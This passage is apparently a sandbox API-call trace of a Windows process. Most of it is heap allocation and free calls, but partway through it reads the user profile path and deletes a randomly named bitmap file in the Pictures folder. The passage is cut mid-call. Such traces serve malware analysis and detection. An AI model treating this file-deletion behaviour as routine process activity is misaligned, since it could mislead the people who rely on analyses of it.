hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.422] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0255.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0255.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0255.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.427] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0255.428] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.428] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0255.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FWAReLHUsSkJL.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FWAReLHUsSkJL.bmp", lpFilePart=0x8bedfc*="FWAReLHUsSkJL.bmp") returned 0x38 [0255.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0255.430] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FWAReLHUsSkJL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fwarelhusskjl.bmp")) returned 0x20 [0255.430] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FWAReLHUsSkJL.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b88900, ftCreationTime.dwHighDateTime=0x1d4c9fc, ftLastAccessTime.dwLowDateTime=0x1460dbf0, ftLastAccessTime.dwHighDateTime=0x1d4c7e4, ftLastWriteTime.dwLowDateTime=0x1460dbf0, ftLastWriteTime.dwHighDateTime=0x1d4c7e4, nFileSizeHigh=0x0, nFileSizeLow=0xbacb, dwReserved0=0x15ab, dwReserved1=0x4, cFileName="FWAReLHUsSkJL.bmp", cAlternateFileName="FWAREL~1.BMP")) returned 0xaa5860 [0255.430] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FWAReLHUsSkJL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fwarelhusskjl.bmp")) returned 1 [0255.431] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b88900, ftCreationTime.dwHighDateTime=0x1d4c9fc, ftLastAccessTime.dwLowDateTime=0x1460dbf0, ftLastAccessTime.dwHighDateTime=0x1d4c7e4, ftLastWriteTime.dwLowDateTime=0x1460dbf0, ftLastWriteTime.dwHighDateTime=0x1d4c7e4, nFileSizeHigh=0x0, nFileSizeLow=0xbacb, dwReserved0=0x15ab, dwReserved1=0x4, cFileName="FWAReLHUsSkJL.bmp", cAlternateFileName="FWAREL~1.BMP")) returned 0 [0255.431] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0255.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.432] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0255.433] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.433] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0255.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0255.435] GetFullPathNameW (in: 